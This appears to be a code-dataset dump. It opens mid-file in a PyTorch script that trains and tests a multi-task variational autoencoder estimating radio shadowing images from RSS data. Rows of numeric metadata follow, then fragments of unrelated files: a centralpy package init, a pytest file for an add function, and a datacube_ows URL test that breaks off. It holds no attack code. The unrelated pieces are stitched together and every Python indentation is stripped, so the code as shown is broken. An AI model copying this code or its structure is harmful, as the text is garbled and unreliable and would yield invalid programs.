test_input_RSS1 = test_input_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS1 = testing_data1['RSS_denoise']
test_denoise_RSS1 = (test_denoise_RSS1 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS1 = test_denoise_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img1 = testing_data1['slf_img']
test_slf_img1 = test_slf_img1.reshape(1, self.args.K0 * self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img1 = np.tile(test_slf_img1, (test_input_RSS1.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab1 = testing_data1['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level1 = testing_data1['sig_epsilon_class']
test_noise_level1 = np.squeeze(test_noise_level1)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS1 = test_input_RSS1[:500]
test_denoise_RSS1 = test_denoise_RSS1[:500]
test_slf_img1 = test_slf_img1[:500]
test_ab1 = test_ab1[:500]
test_noise_level1 = test_noise_level1[:500]
elif noise_level == 'mid':
test_input_RSS1 = test_input_RSS1[500:1000]
test_denoise_RSS1 = test_denoise_RSS1[500:1000]
test_slf_img1 = test_slf_img1[500:1000]
test_ab1 = test_ab1[500:1000]
test_noise_level1 = test_noise_level1[500:1000]
elif noise_level == 'high':
test_input_RSS1 = test_input_RSS1[1000:]
test_denoise_RSS1 = test_denoise_RSS1[1000:]
test_slf_img1 = test_slf_img1[1000:]
test_ab1 = test_ab1[1000:]
test_noise_level1 = test_noise_level1[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS1 = torch.from_numpy(test_input_RSS1).float()
test_denoise_RSS1 = torch.from_numpy(test_denoise_RSS1).float()
test_slf_img1 = torch.from_numpy(test_slf_img1).float()
test_ab1 = torch.from_numpy(test_ab1).float()
test_noise_level1 = torch.from_numpy(test_noise_level1).long()
Test_Dataset_1 = TensorDataset(test_input_RSS1, test_denoise_RSS1, test_slf_img1, test_ab1, test_noise_level1)
return Test_Dataset_1
def load_testing_img2(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 2
testing_data2 = sio.loadmat('./data/testing_data_image2.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS2 = testing_data2['RSS']
test_input_RSS2 = (test_input_RSS2 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS2 = test_input_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS2 = testing_data2['RSS_denoise_norm']
test_denoise_RSS2 = (test_denoise_RSS2 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS2 = test_denoise_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img2 = testing_data2['slf_img']
test_slf_img2 = test_slf_img2.reshape(1, self.args.K0 * self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img2 = np.tile(test_slf_img2, (test_input_RSS2.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab2 = testing_data2['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level2 = testing_data2['sig_epsilon_class']
test_noise_level2 = np.squeeze(test_noise_level2)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS2 = test_input_RSS2[:500]
test_denoise_RSS2 = test_denoise_RSS2[:500]
test_slf_img2 = test_slf_img2[:500]
test_ab2 = test_ab2[:500]
test_noise_level2 = test_noise_level2[:500]
elif noise_level == 'mid':
test_input_RSS2 = test_input_RSS2[500:1000]
test_denoise_RSS2 = test_denoise_RSS2[500:1000]
test_slf_img2 = test_slf_img2[500:1000]
test_ab2 = test_ab2[500:1000]
test_noise_level2 = test_noise_level2[500:1000]
elif noise_level == 'high':
test_input_RSS2 = test_input_RSS2[1000:]
test_denoise_RSS2 = test_denoise_RSS2[1000:]
test_slf_img2 = test_slf_img2[1000:]
test_ab2 = test_ab2[1000:]
test_noise_level2 = test_noise_level2[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS2 = torch.from_numpy(test_input_RSS2).float()
test_denoise_RSS2 = torch.from_numpy(test_denoise_RSS2).float()
test_slf_img2 = torch.from_numpy(test_slf_img2).float()
test_ab2 = torch.from_numpy(test_ab2).float()
test_noise_level2 = torch.from_numpy(test_noise_level2).long()
Test_Dataset_2 = TensorDataset(test_input_RSS2, test_denoise_RSS2, test_slf_img2, test_ab2, test_noise_level2)
return Test_Dataset_2
def train(self, model, train_loader, optimizer, epoch):
model.train()
train_loss = 0 # total loss
train_kld = 0 # total kl-divergence
train_loss_task0 = 0 # loss for reconstruct RSS
train_loss_task1 = 0 # loss for SLF image estimation
train_loss_task2 = 0 # loss for parameters estimation
train_loss_task3 = 0 # loss for noise level prediction
train_acc = 0 # accuracy for noise level prediction
train_kl_loss_w = 0 # kl-divergence for w
train_kl_loss_h = 0 # kl-divergence for h
train_kl_loss_c = 0 # kl-divergence for c
batch_num = int(len(train_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(train_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
optimizer.zero_grad()
KLD, RSS, SLF, ab, noise_level, kl_loss_w, kl_loss_h, kl_loss_c = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch-1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1\
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
train_loss += loss.item()
train_kld += KLD.item()
train_kl_loss_w += kl_loss_w.item()
train_kl_loss_h += kl_loss_h.item()
train_kl_loss_c += kl_loss_c.item()
train_loss_task0 += loss_task0.item()
train_loss_task1 += loss_task1.item()
train_loss_task2 += loss_task2.item()
train_loss_task3 += loss_task3.item()
_, noise_pred = torch.max(noise_level, 1)
acc_task3 = (noise_pred == target_noise_level).sum()
train_acc += acc_task3.item()
loss /= input_RSS.size(0)
loss.backward()
optimizer.step()
if batch_idx % self.args.log_interval == 0:
print(
'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tKLD: {:.6f}\tLoss0: {:.6f}\tLoss1: {:.6f}\tLoss2: {:.6f}\tLoss3: {:.6f}\tAcc: {:.6f}'.format(
epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
100. * batch_idx / len(train_loader),
loss.item(),
KLD.item() / len(input_RSS),
loss_task0.item() / len(input_RSS), loss_task1.item() / len(input_RSS),
loss_task2.item() / len(input_RSS), loss_task3.item() / len(input_RSS), acc_task3.item() / len(input_RSS)))
print(
'Train Epoch: {} [{}/{} ({:.0f}%)]\tkld_w: {:.6f}\tkld_h: {:.6f}\tkld_c: {:.6f}'.format(
epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
100. * batch_idx / len(train_loader),
kl_loss_w.item() / len(input_RSS),
kl_loss_h.item() / len(input_RSS),
kl_loss_c.item() / len(input_RSS)))
train_loss /= len(train_loader.dataset)
train_kld /= len(train_loader.dataset)
train_kl_loss_w /= len(train_loader.dataset)
train_kl_loss_h /= len(train_loader.dataset)
train_kl_loss_c /= len(train_loader.dataset)
train_loss_task0 /= len(train_loader.dataset)
train_loss_task1 /= len(train_loader.dataset)
train_loss_task2 /= len(train_loader.dataset)
train_loss_task3 /= len(train_loader.dataset)
train_acc /= len(train_loader.dataset)
print('====> Epoch: {} Average loss: {:.6f}'.format(epoch, train_loss))
print('====> KL divergence: {:.6f}'.format(train_kld))
print('====> KLD_W: {:.6f}'.format(train_kl_loss_w))
print('====> KLD_H: {:.6f}'.format(train_kl_loss_h))
print('====> KLD_C: {:.6f}'.format(train_kl_loss_c))
print('====> RSS loss: {:.6f}'.format(train_loss_task0))
print('====> SLF loss: {:.6f}'.format(train_loss_task1))
print('====> ab loss: {:.6f}'.format(train_loss_task2))
print('====> noise level loss: {:.6f}'.format(train_loss_task3))
print('====> noise level Accuracy: {:.4f}'.format(train_acc))
return train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c
def validate(self, model, val_loader, epoch):
model.eval()
val_loss = 0 # total loss
val_rmse_slf = 0 # slf reconstruction loss
val_mae_slf = 0 # slf reconstruction loss
batch_num = int(len(val_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(val_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level, *_ = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = 0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
val_loss += loss.item()
slf_mse = F.mse_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
slf_mae = F.l1_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
val_rmse_slf += slf_mse.item()
val_mae_slf += slf_mae.item()
val_loss /= len(val_loader.dataset)
val_rmse_slf /= len(val_loader.dataset)
val_rmse_slf = np.sqrt(val_rmse_slf)
val_mae_slf /= len(val_loader.dataset)
print('====> Validation set loss: {:.6f}'.format(val_loss))
print('====> Validation set SLF rmse: {:.6f}'.format(val_rmse_slf))
print('====> Validation set SLF mae: {:.6f}'.format(val_mae_slf))
return val_loss, val_rmse_slf, val_mae_slf
def test(self, model, test_loader, epoch):
model.eval()
test_loss = 0 # total loss
test_kld = 0 # KL-divergence
test_loss_task0 = 0 # loss for reconstruct RSS
test_loss_task1 = 0 # loss for SLF image estimation
test_loss_task2 = 0 # loss for parameters estimation
test_loss_task3 = 0 # loss for noise level prediction
test_kl_loss_w = 0 # kl-divergence for w
test_kl_loss_h = 0 # kl-divergence for h
test_kl_loss_c = 0 # kl-divergence for c
batch_num = int(len(test_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
with torch.no_grad():
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level, kl_loss_w, kl_loss_h, kl_loss_c = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
test_loss += loss.item()
test_kld += KLD.item()
test_kl_loss_w += kl_loss_w.item()
test_kl_loss_h += kl_loss_h.item()
test_kl_loss_c += kl_loss_c.item()
test_loss_task0 += loss_task0.item()
test_loss_task1 += loss_task1.item()
test_loss_task2 += loss_task2.item()
test_loss_task3 += loss_task3.item()
test_loss /= len(test_loader.dataset)
test_kld /= len(test_loader.dataset)
test_kl_loss_w /= len(test_loader.dataset)
test_kl_loss_h /= len(test_loader.dataset)
test_kl_loss_c /= len(test_loader.dataset)
test_loss_task0 /= len(test_loader.dataset)
test_loss_task1 /= len(test_loader.dataset)
test_loss_task2 /= len(test_loader.dataset)
test_loss_task3 /= len(test_loader.dataset)
test_acc = self.test_accuracy(model, test_loader)
print('====> Test set loss: {:.6f}'.format(test_loss))
print('====> Test set KL divergence: {:.6f}'.format(test_kld))
print('====> Test set KLD_W: {:.6f}'.format(test_kl_loss_w))
print('====> Test set KLD_H: {:.6f}'.format(test_kl_loss_h))
print('====> Test set KLD_C: {:.6f}'.format(test_kl_loss_c))
print('====> Test set RSS loss: {:.6f}'.format(test_loss_task0))
print('====> Test set SLF loss: {:.6f}'.format(test_loss_task1))
print('====> Test set ab loss: {:.6f}'.format(test_loss_task2))
print('====> Test set noise level loss: {:.6f}'.format(test_loss_task3))
print('====> Test set noise level Accuracy: {:.4f}'.format(test_acc))
return test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c
def train_save(self):
model = MLMVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
def weights_init(m):
if isinstance(m, torch.nn.Linear) or isinstance(m, torch.nn.Conv2d) or isinstance(m,
torch.nn.ConvTranspose2d):
torch.nn.init.xavier_uniform_(m.weight.data)
if m.bias is not None:
torch.nn.init.zeros_(m.bias.data)
model.apply(weights_init)
model = model.to(self.device)
summary(model, input_size=(self.args.batch_size, self.args.N, self.args.P, self.args.P))
train_loader, val_loader, test_loader, test_loader1, test_loader2 = self.load_data()
optimizer = self.get_optimizer(model.parameters())
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=0.25, patience=10, min_lr=1e-5)
train_set = []
val_set = []
test_set = [] # for test set
test_set1 = [] # for test image 1
test_set2 = [] # for test image 2
train_loss_path = self.path + 'train_loss_' + str(self.args.n_epochs) + '.npy'
val_loss_path = self.path + 'val_loss_' + str(self.args.n_epochs) + '.npy'
test_loss_path = self.path + 'test_loss_' + str(self.args.n_epochs) + '.npz'
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
current_val_slf_loss = np.inf
for epoch in range(1, self.args.n_epochs + 1):
print("Epoch %d learning rate:%f" % (epoch, optimizer.param_groups[0]['lr']))
train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c = self.train(
model,
train_loader,
optimizer,
epoch)
train_set.append(
[train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3,
train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c])
print('====> Validation Loss for Epoch {:d}'.format(epoch))
val_loss, val_slf_rmse, val_slf_mae = self.validate(model, val_loader, epoch)
val_set.append([val_loss, val_slf_rmse, val_slf_mae])
scheduler.step(val_loss)
print('====> Test for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
model,
test_loader, epoch)
test_set.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
print('====> Test Image1 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
model,
test_loader1, epoch)
test_set1.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
print('====> Test Image2 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
model,
test_loader2, epoch)
test_set2.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
if epoch % self.args.save_freq == 0:
ckpt_path = self.path + '/model' + '_' + str(epoch) + '.pth'
torch.save(model.state_dict(), ckpt_path)
print('checkpoint{}.pth saved!'.format(epoch))
if val_slf_mae < current_val_slf_loss:
torch.save(model.state_dict(), model_path)
current_val_slf_loss = val_slf_mae
train_loss = np.asarray(train_set).reshape(-1, 10)
val_loss = np.asarray(val_set).reshape(-1, 3)
test_loss = np.asarray(test_set).reshape(-1, 10)
test_loss1 = np.asarray(test_set1).reshape(-1, 10)
test_loss2 = np.asarray(test_set2).reshape(-1, 10)
np.save(train_loss_path, train_loss)
np.save(val_loss_path, val_loss)
np.savez(test_loss_path, test_loss=test_loss, test_loss1=test_loss1, test_loss2=test_loss2)
def test_accuracy(self, model, test_loader):
model.eval()
acc = 0
for i, (input_RSS, *_, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS) # noise_pred: [batch_size, 3]
noise_pred = noise_pred.detach().cpu().numpy()
noise_pred = np.argmax(noise_pred, axis=1)
labels = target_noise_level.detach().cpu().numpy()
acc += np.sum((noise_pred == labels).astype(int))
acc /= len(test_loader.dataset)
return acc
def test_model(self, noise_level='all'):
model = MLMVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
model = model.to(self.device)
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
model.load_state_dict(torch.load(model_path, map_location=self.device))
model.eval()
*_, test_loader, test_loader1, test_loader2 = self.load_data(noise_level)
noise_class = 0 # noise_class = 0 stands for all noise classes
if noise_level == 'low':
noise_class = 1
elif noise_level == 'mid':
noise_class = 2
elif noise_level == 'high':
noise_class = 3
# test model for testing set
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(
test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader.dataset)
ab_rmse /= len(test_loader.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader)
print('====> Test for Testing Set:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# test model for image 1
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader1):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF1_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader1.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader1.dataset)
ab_rmse /= len(test_loader1.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader1)
print('====> Test for image 1:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# test model for image 2
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader2):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF2_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader2.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader2.dataset)
ab_rmse /= len(test_loader2.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader2)
print('====> Test for image 2:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
| 57.830873
| 182
| 0.610163
| 25,377
| 188,066
| 4.205068
| 0.013201
| 0.053977
| 0.019567
| 0.021085
| 0.988239
| 0.986618
| 0.985981
| 0.985981
| 0.985091
| 0.98406
| 0
| 0.028501
| 0.27166
| 188,066
| 3,252
| 183
| 57.830873
| 0.750555
| 0.090091
| 0
| 0.969407
| 0
| 0.00258
| 0.065922
| 0.005733
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026907
| false
| 0.005898
| 0.00516
| 0
| 0.056395
| 0.081828
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8cec1dec9b6607aa204bf23f40ef40a649c6e18c
| 458
|
py
|
Python
|
centralpy/responses/__init__.py
|
pmaengineering/centralpy
|
edd89925bcc4204add1bf93b7ff3437cc0e6ea92
|
[
"MIT"
] | null | null | null |
centralpy/responses/__init__.py
|
pmaengineering/centralpy
|
edd89925bcc4204add1bf93b7ff3437cc0e6ea92
|
[
"MIT"
] | 1
|
2022-01-22T14:36:57.000Z
|
2022-01-24T07:19:44.000Z
|
centralpy/responses/__init__.py
|
pmaengineering/centralpy
|
edd89925bcc4204add1bf93b7ff3437cc0e6ea92
|
[
"MIT"
] | 1
|
2021-06-30T13:45:09.000Z
|
2021-06-30T13:45:09.000Z
|
"""Module for possible ODK Central responses."""
from centralpy.responses.attachment import Attachment
from centralpy.responses.attachment_listing import AttachmentListing
from centralpy.responses.csv_zip import CsvZip
from centralpy.responses.form_listing import FormListing
from centralpy.responses.project_listing import ProjectListing
from centralpy.responses.response import Response
from centralpy.responses.submission_listing import SubmissionListing
| 50.888889
| 68
| 0.879913
| 53
| 458
| 7.509434
| 0.415094
| 0.228643
| 0.386935
| 0.160804
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074236
| 458
| 8
| 69
| 57.25
| 0.938679
| 0.091703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
50aa022d209d97457ea14fb1b3d0a19aeae938e3
| 151
|
py
|
Python
|
tests/test_custom_utils.py
|
tahseenadit/azure-pipeline-pyscaffold-unittest
|
2f78ef1d53a5e0aae45e1901dc333833a33ef5d2
|
[
"MIT"
] | null | null | null |
tests/test_custom_utils.py
|
tahseenadit/azure-pipeline-pyscaffold-unittest
|
2f78ef1d53a5e0aae45e1901dc333833a33ef5d2
|
[
"MIT"
] | null | null | null |
tests/test_custom_utils.py
|
tahseenadit/azure-pipeline-pyscaffold-unittest
|
2f78ef1d53a5e0aae45e1901dc333833a33ef5d2
|
[
"MIT"
] | null | null | null |
import pytest
from demoproject.custom_utils import add
def test_add():
assert add(2,5) == 7
assert add(2.5,2.5) == 5
assert add(6,6) == 12
| 21.571429
| 40
| 0.649007
| 28
| 151
| 3.428571
| 0.535714
| 0.28125
| 0.208333
| 0.229167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10084
| 0.211921
| 151
| 7
| 41
| 21.571429
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.166667
| true
| 0
| 0.333333
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
50aeb890a9857838963354f75af1cac3cb99ff39
| 1,834
|
py
|
Python
|
tests/test_ogc_utils.py
|
GispoCoding/datacube-ows
|
4ffe14ccf9f382bff8f4a33fc54729d3e18b670e
|
[
"Apache-2.0"
] | 2
|
2020-08-10T13:41:42.000Z
|
2020-09-23T22:20:00.000Z
|
tests/test_ogc_utils.py
|
GispoCoding/datacube-ows
|
4ffe14ccf9f382bff8f4a33fc54729d3e18b670e
|
[
"Apache-2.0"
] | null | null | null |
tests/test_ogc_utils.py
|
GispoCoding/datacube-ows
|
4ffe14ccf9f382bff8f4a33fc54729d3e18b670e
|
[
"Apache-2.0"
] | 2
|
2020-07-31T16:54:23.000Z
|
2020-08-10T13:42:41.000Z
|
import datacube_ows.ogc_utils
import pytest
def test_get_service_base_url():
# not a list
allowed_urls = "https://foo.hello.world"
request_url = "https://foo.bar.baz"
ret = datacube_ows.ogc_utils.get_service_base_url(allowed_urls, request_url)
assert ret == "https://foo.hello.world"
# Value not in list
allowed_urls = ["https://foo.hello.world", "https://alice.bob.eve"]
request_url = "https://foo.bar.baz"
